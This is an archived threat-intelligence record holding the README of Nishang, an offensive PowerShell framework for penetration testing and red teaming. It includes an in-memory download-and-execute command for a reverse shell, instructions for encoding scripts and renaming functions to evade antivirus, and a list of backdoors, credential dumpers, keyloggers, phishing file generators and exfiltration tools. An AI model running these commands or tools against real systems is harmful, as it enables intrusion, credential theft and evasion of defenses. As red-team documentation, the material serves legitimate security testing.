{
	"id": "d3c8f5b1-a108-49a0-acdf-5eb922bcd5ee",
	"created_at": "2026-04-06T00:19:32.196376Z",
	"updated_at": "2026-04-10T03:21:37.608288Z",
	"deleted_at": null,
	"sha1_hash": "5763cf0a875ac7b8c72f885b07317440cef3d343",
	"title": "GitHub - samratashok/nishang: Nishang - Offensive PowerShell for red team, penetration testing and offensive security.",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 88613,
	"plain_text": "GitHub - samratashok/nishang: Nishang - Offensive PowerShell\r\nfor red team, penetration testing and offensive security.\r\nBy samratashok\r\nArchived: 2026-04-02 12:44:23 UTC\r\nNishang is a framework and collection of scripts and payloads which enables usage of PowerShell\r\nfor offensive security, penetration testing and red teaming. Nishang is useful during all phases of\r\npenetration testing.\r\nBy Nikhil Mittal Founder of Altered Security - Hands-on red team and enterprise security training!\r\nUsage\r\nImport all the scripts in the current PowerShell session (PowerShell v3 onwards).\r\nPS C:\\nishang\u003e Import-Module .\\nishang.psm1\r\nUse the individual scripts with dot sourcing.\r\nPS C:\\nishang\u003e . C:\\nishang\\Gather\\Get-Information.ps1\r\nPS C:\\nishang\u003e Get-Information\r\nTo get help about any script or function, use:\r\nPS C:\\nishang\u003e Get-Help [scriptname] -full\r\nNote that the help is available for the function loaded after running the script and not the script itself since version\r\n0.3.8. In all cases, the function name is same as the script name.\r\nFor example, to see the help about Get-WLAN-Keys.ps1, use\r\nPS C:\\nishang\u003e . C:\\nishang\\Get-WLAN-Keys.ps1\r\nPS C:\\nishang\u003e Get-Help Get-WLAN-Keys -Full\r\nAnti Virus\r\nhttps://github.com/samratashok/nishang\r\nPage 1 of 10\n\nNishang scripts are flagged by many Anti Viruses as malicious. The scrripts on a target are meant to be used in\r\nmemory which is very easy to do with PowerShell. Two basic methods to execute PowerShell scripts in memory:\r\nMethod 1. Use the in-memory dowload and execute: Use below command to execute a PowerShell script from a\r\nremote shell, meterpreter native shell, a web shell etc. and the function exported by it. 
All the scripts in Nishang\r\nexport a function with same name in the current PowerShell session.\r\npowershell iex (New-Object Net.WebClient).DownloadString('http://\u003cyourwebserver\u003e/Invoke-PowerShellTcp\r\nMethod 2. Use the -encodedcommand (or -e ) parameter of PowerShell. All the scripts in Nishang export a\r\nfunction with same name in the current PowerShell session. Therefore, make sure the function call is made in the\r\nscript itself while using encodedcommand parameter from a non-PowerShell shell. For above example, add a\r\nfunction call (without quotes) \"Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]\" .\r\nEncode the script using Invoke-Encode from Nishang:\r\nPS C:\\nishang\u003e . \\nishang\\Utility\\Invoke-Encode\r\nPS C:\\nishang\u003e Invoke-Encode -DataToEncode C:\\nishang\\Shells\\Invoke-PowerShellTcp.ps1 -OutCommand\r\nEncoded data written to .\\encoded.txt\r\nEncoded command written to .\\encodedcommand.txt\r\nFrom above, use the encoded script from encodedcommand.txt and run it on a target where commands could be\r\nexecuted (a remote shell, meterpreter native shell, a web shell etc.). 
Use it like below:\r\nC:\\Users\\target\u003e powershell -e [encodedscript]\r\nIf the scripts still get detected changing the function and parameter names and removing the help content will\r\nhelp.\r\nIn case Windows 10's AMSI is still blocking script execution, see this blog:\r\nhttp://www.labofapenetrationtester.com/2016/09/amsi.html\r\nScripts\r\nNishang currently contains the following scripts and payloads.\r\nActiveDirectory\r\nSet-DCShadowPermissions\r\nModify AD objects to provide minimal permissions required for DCShadow.\r\nAntak - the Webshell\r\nAntak\r\nExecute PowerShell scripts in memory, run commands, and download and upload files using this webshell.\r\nBackdoors\r\nHTTP-Backdoor\r\nA backdoor which can receive instructions from third party websites and execute PowerShell scripts in memory.\r\nDNS_TXT_Pwnage\r\nA backdoor which can receive commands and PowerShell scripts from DNS TXT queries, execute them on a\r\ntarget, and be remotely controlled using the queries.\r\nExecute-OnTime\r\nA backdoor which can execute PowerShell scripts at a given time on a target.\r\nGupt-Backdoor\r\nA backdoor which can receive commands and scripts from a WLAN SSID without connecting to it.\r\nAdd-ScrnSaveBackdoor\r\nA backdoor which can use Windows screen saver for remote command and script execution.\r\nInvoke-ADSBackdoor\r\nA backdoor which can use alternate data streams and Windows Registry to achieve persistence.\r\nAdd-RegBackdoor\r\nA backdoor which uses well known Debugger trick to execute payload with Sticky keys and Utilman (Windows\r\nkey + U).\r\nSet-RemoteWMI\r\nModify permissions of DCOM and WMI namespaces to allow access to a non-admin user.\r\nSet-RemotePSRemoting\r\nModify permissions of PowerShell remoting to allow access to a non-admin user.\r\nBypass\r\nInvoke-AmsiBypass\r\nImplementation of publicly known methods to bypass/avoid 
AMSI.\r\nClient\r\nOut-CHM\r\nCreate infected CHM files which can execute PowerShell commands and scripts.\r\nOut-Word\r\nCreate Word files and infect existing ones to run PowerShell commands and scripts.\r\nOut-Excel\r\nCreate Excel files and infect existing ones to run PowerShell commands and scripts.\r\nOut-HTA\r\nCreate a HTA file which can be deployed on a web server and used in phishing campaigns.\r\nOut-Java\r\nCreate signed JAR files which can be used with applets for script and command execution.\r\nOut-Shortcut\r\nCreate shortcut files capable of executing PowerShell commands and scripts.\r\nOut-WebQuery\r\nCreate IQY files for phishing credentials and SMB hashes.\r\nOut-JS\r\nCreate JS files capable of executing PowerShell commands and scripts.\r\nOut-SCT\r\nCreate SCT files capable of executing PowerShell commands and scripts.\r\nOut-SCF\r\nCreate a SCF file which can be used for capturing NTLM hash challenges.\r\nEscalation\r\nEnable-DuplicateToken\r\nWhen SYSTEM privileges are required.\r\nRemove-Update\r\nIntroduce vulnerabilities by removing patches.\r\nInvoke-PsUACme\r\nBypass UAC.\r\nExecution\r\nDownload-Execute-PS\r\nDownload and execute a PowerShell script in memory.\r\nDownload_Execute\r\nDownload an executable in text format, convert it to an executable, and execute.\r\nExecute-Command-MSSQL\r\nRun PowerShell commands, native commands, or SQL commands on a MSSQL Server with sufficient privileges.\r\nExecute-DNSTXT-Code\r\nExecute shellcode in memory using DNS TXT queries.\r\nOut-RundllCommand\r\nExecute PowerShell commands and scripts or a reverse PowerShell session using rundll32.exe.\r\nGather\r\nCheck-VM\r\nCheck for a virtual machine.\r\nCopy-VSS\r\nCopy the SAM file using Volume Shadow Copy Service.\r\nInvoke-CredentialsPhish\r\nTrick a user into giving credentials in plain text.\r\nFireBuster FireListener\r\nA pair of scripts for egress testing\r\nGet-Information\r\nGet juicy 
information from a target.\r\nGet-LSASecret\r\nGet LSA Secret from a target.\r\nGet-PassHashes\r\nGet password hashes from a target.\r\nGet-WLAN-Keys\r\nGet WLAN keys in plain text from a target.\r\nKeylogger\r\nLog keystrokes from a target.\r\nInvoke-MimikatzWdigestDowngrade\r\nDump user passwords in plain on Windows 8.1 and Server 2012\r\nGet-PassHints\r\nGet password hints of Windows users from a target.\r\nShow-TargetScreen\r\nConnect back and Stream target screen using MJPEG.\r\nInvoke-Mimikatz\r\nLoad mimikatz in memory. Updated and with some customisation.\r\nInvoke-Mimikittenz\r\nExtract juicy information from target process (like browsers) memory using regex.\r\nInvoke-SSIDExfil\r\nExfiltrate information like user credentials, using WLAN SSID.\r\nInvoke-SessionGopher\r\nIdentify admin jump-boxes and/or computers used to access Unix machines.\r\nMITM\r\nInvoke-Interceptor\r\nA local HTTPS proxy for MITM attacks.\r\nPivot\r\nCreate-MultipleSessions\r\nCheck credentials on multiple computers and create PSSessions.\r\nRun-EXEonRemote\r\nCopy and execute an executable on multiple machines.\r\nInvoke-NetworkRelay\r\nCreate network relays between computers.\r\nPrasadhak\r\nPrasadhak\r\nCheck running hashes of running process against the VirusTotal database.\r\nScan\r\nBrute-Force\r\nBrute force FTP, Active Directory, MSSQL, and Sharepoint.\r\nPort-Scan\r\nA handy port scanner.\r\nPowerpreter\r\nPowerpreter\r\nAll the functionality of nishang in a single script module.\r\nShells\r\nInvoke-PsGcat\r\nSend commands and scripts to specified Gmail account to be executed by Invoke-PsGcatAgent\r\nInvoke-PsGcatAgent\r\nExecute commands and scripts sent by Invoke-PsGcat.\r\nInvoke-PowerShellTcp\r\nAn interactive PowerShell reverse connect or bind shell\r\nInvoke-PowerShellTcpOneLine\r\nStripped down version of Invoke-PowerShellTcp. 
Also contains a skeleton version which could fit in two tweets.\r\nInvoke-PowerShellTcpOneLineBind\r\nBind version of Invoke-PowerShellTcpOneLine.\r\nInvoke-PowerShellUdp\r\nAn interactive PowerShell reverse connect or bind shell over UDP\r\nInvoke-PowerShellUdpOneLine\r\nStripped down version of Invoke-PowerShellUdp.\r\nInvoke-PoshRatHttps\r\nReverse interactive PowerShell over HTTPS.\r\nInvoke-PoshRatHttp\r\nReverse interactive PowerShell over HTTP.\r\nRemove-PoshRat\r\nClean the system after using Invoke-PoshRatHttps\r\nInvoke-PowerShellWmi\r\nInteractive PowerShell using WMI.\r\nInvoke-PowerShellIcmp\r\nAn interactive PowerShell reverse shell over ICMP.\r\nInvoke-JSRatRundll\r\nAn interactive PowerShell reverse shell over HTTP using rundll32.exe.\r\nInvoke-JSRatRegsvr\r\nAn interactive PowerShell reverse shell over HTTP using regsvr32.exe.\r\nUtility\r\nAdd-Exfiltration\r\nAdd data exfiltration capability to Gmail, Pastebin, a web server, and DNS to any script.\r\nAdd-Persistence\r\nAdd reboot persistence capability to a script.\r\nRemove-Persistence\r\nRemove persistence added by the Add-Persistence script.\r\nDo-Exfiltration\r\nPipe (|) this to any script to exfiltrate the output.\r\nDownload\r\nTransfer a file to the target.\r\nParse_Keys\r\nParse keys logged by the keylogger.\r\nInvoke-Encode\r\nEncode and compress a script or string.\r\nInvoke-Decode\r\nDecode and decompress a script or string from Invoke-Encode.\r\nStart-CaptureServer\r\nRun a web server which logs Basic authentication and SMB hashes.\r\nConvertTo-ROT13\r\nEncode a string to ROT13 or decode a ROT13 string.\r\nOut-DnsTxt\r\nGenerate DNS TXT records which could be used with other scripts.\r\n[Base64ToString]\r\n[StringToBase64]\r\n[ExetoText]\r\n[TexttoExe]\r\nUpdates\r\nUpdates about Nishang can be found at my blog http://labofapenetrationtester.com and my Twitter 
feed\r\n@nikhil_mitt.\r\nBugs, Feedback and Feature Requests\r\nPlease raise an issue if you encounter a bug or have a feature request. You can email me at nikhil [dot] uitrgpv at\r\ngmail.com\r\nMailing List\r\nFor feedback, discussions, and feature requests, join: http://groups.google.com/group/nishang-users\r\nContributing\r\nI am always looking for contributors to Nishang. Please submit requests or drop me an email.\r\nBlog Posts\r\nSome helpful blog posts to check out for beginners:\r\nhttp://www.labofapenetrationtester.com/2014/06/nishang-0-3-4.html\r\nhttp://labofapenetrationtester.com/2012/08/introducing-nishang-powereshell-for.html\r\nhttp://labofapenetrationtester.com/2013/08/powerpreter-and-nishang-Part-1.html\r\nhttp://www.labofapenetrationtester.com/2013/09/powerpreter-and-nishang-Part-2.html\r\nAll posts about Nishang:\r\nhttp://www.labofapenetrationtester.com/search/label/Nishang\r\nSource: https://github.com/samratashok/nishang",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://github.com/samratashok/nishang"
	],
	"report_names": [
		"nishang"
	],
	"threat_actors": [],
	"ts_created_at": 1775434772,
	"ts_updated_at": 1775791297,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/5763cf0a875ac7b8c72f885b07317440cef3d343.pdf",
		"text": "https://archive.orkl.eu/5763cf0a875ac7b8c72f885b07317440cef3d343.txt",
		"img": "https://archive.orkl.eu/5763cf0a875ac7b8c72f885b07317440cef3d343.jpg"
	}
}